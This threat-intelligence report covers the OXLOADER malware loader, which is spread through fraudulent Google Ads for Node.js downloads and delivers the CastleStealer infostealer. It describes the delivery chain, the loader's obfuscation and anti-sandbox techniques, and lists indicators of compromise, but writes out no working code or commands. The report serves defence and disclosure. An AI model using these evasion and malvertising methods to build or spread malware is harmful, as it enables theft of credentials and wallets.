Elastic Security Labs has published research on OXLOADER, a previously undocumented malware loader that uses malicious Google Ads as its initial access vector and delivers the CastleStealer information stealer as its final payload. Tracked as campaign REF8372, the operation demonstrates sophisticated engineering investment — including multiple layers of obfuscation, anti-sandbox techniques, and abuse of legitimate cloud infrastructure — designed to ensure long-term operational durability.
Initial Access: Malvertising via Google Ads
The campaign begins with threat actors purchasing Google Ads under a fraudulent Ukrainian advertiser identity ("ВОЛОДИМИР ТЕРЕЩЕНКО") targeting high-volume developer search terms. Specifically, the ads appeared for searches like "latest version of node.js" — a query that pulls in a large, technically-oriented audience predisposed to downloading and installing software.
Clicking the ad redirects victims to a spoofed domain: node-js[.]prentiva99[.]info
The fake site presents a convincing installation wizard while PowerShell silently downloads the OXLOADER binary in the background from Storj, a decentralized cloud storage platform. The use of Storj is deliberate — decentralized infrastructure is resilient to traditional domain takedown operations and bypasses domain reputation blocklists.
The downloaded binary is then launched with the -Verb RunAs parameter, triggering a Windows UAC prompt to request elevated privileges before the payload executes.
Google removed the fraudulent advertiser account and associated campaigns on May 14, 2026, though the infrastructure remained active and the campaign had been running for an undetermined period before discovery.
OXLOADER: Obfuscation Engineering
OXLOADER is a heavily engineered loader designed with analyst evasion as a primary design goal. Elastic Security Labs identified the following anti-analysis techniques:
| Technique | Description |
|---|---|
| Control-flow flattening | Scrambles logical execution flow to defeat decompilers |
| Opaque predicates | Inserts always-true/false conditionals to confuse disassemblers |
| Mixed Boolean-Arithmetic (MBA) | Obfuscates arithmetic operations to resist static analysis |
| Self-modifying decryption stubs | Decryption routines rewrite themselves at runtime to evade signatures |
.reloc section abuse | Stages shellcode in the binary's Windows relocation section |
| Anti-VM / sandbox detection | Environment checks to bail out of automated analysis systems |
| DLL side-loading | Uses a rogue DLL to decrypt and execute the final payload |
The combination of these techniques produces a binary that static analysis engines have significant difficulty fingerprinting. Elastic reported low detection rates against static analysis engines at time of discovery.
As Elastic researchers noted: "The code obfuscation, anti-VM measures, benign-looking code used to masquerade its binaries, and unique staging techniques reflect deliberate engineering choices to evade analysis."
Final Payload: CastleStealer
The ultimate objective of the OXLOADER chain is deploying CastleStealer, a .NET-based information stealer. CastleStealer is not new — it was previously documented in the BackgroundFix campaign, where it was distributed alongside CastleLoader masquerading as free image-editing software. CastleLoader is attributed to the GrayBravo threat activity cluster.
Information stealers in this class typically target:
- Browser-saved credentials and cookies
- Cryptocurrency wallet data
- Authentication tokens stored by desktop applications
- System and network reconnaissance data
The reuse of CastleStealer from BackgroundFix, combined with the presence of CastleLoader tooling associated with GrayBravo, suggests infrastructure or actor overlap between REF8372 and prior campaigns.
Attribution: Russia-Nexus Indicators
No formal attribution has been made, but several indicators point toward Russian-speaking threat actors with financial motivation:
- CIS region exclusion: Machines in Commonwealth of Independent States countries are deliberately excluded from infection — a hallmark operational security practice among Eastern European cybercriminal groups to avoid drawing attention from local law enforcement
- GrayBravo correlation: The presence of CastleLoader tooling connects REF8372 to the GrayBravo cluster
- Financial motivation: The infostealer payload is consistent with credential theft-for-profit operations rather than espionage
Indicators of Compromise
| Indicator | Value |
|---|---|
| Fake domain | node-js[.]prentiva99[.]info |
| Payload host | Storj (decentralized cloud storage) |
| OXLOADER SHA-256 | 9a9939dff297997732aaade9b243d695632cbd64033c5fbcb9de3d09b7e6c28d |
| Campaign ID | REF8372 |
| Related malware | CastleLoader, CastleStealer |
| Related cluster | GrayBravo |
| Related campaign | BackgroundFix |
What Makes REF8372 Notable
Three elements of this campaign stand out:
Legitimate infrastructure abuse at scale. Hosting payloads on Storj, a legitimate decentralized cloud platform, provides resilience against takedowns and blends into normal cloud storage traffic. This is increasingly common among sophisticated threat actors.
Developers as a high-value target. Targeting searches for developer tools is strategic — developers typically have access to source code repositories, CI/CD pipelines, cloud credentials, and internal APIs. A compromised developer workstation can have significantly higher blast radius than a standard user endpoint.
Engineering investment signals long-term intent. The depth of obfuscation in OXLOADER — multiple stacked anti-analysis layers, self-modifying stubs, .reloc section staging — represents substantial development effort. This is not a one-off campaign tool; the actors clearly expect to reuse this loader across multiple operations.
Organizations should ensure their endpoint security tooling performs behavioral analysis rather than relying solely on static signatures for loader detection, and should consider DNS-level blocking for known malvertising infrastructure as a supplementary control.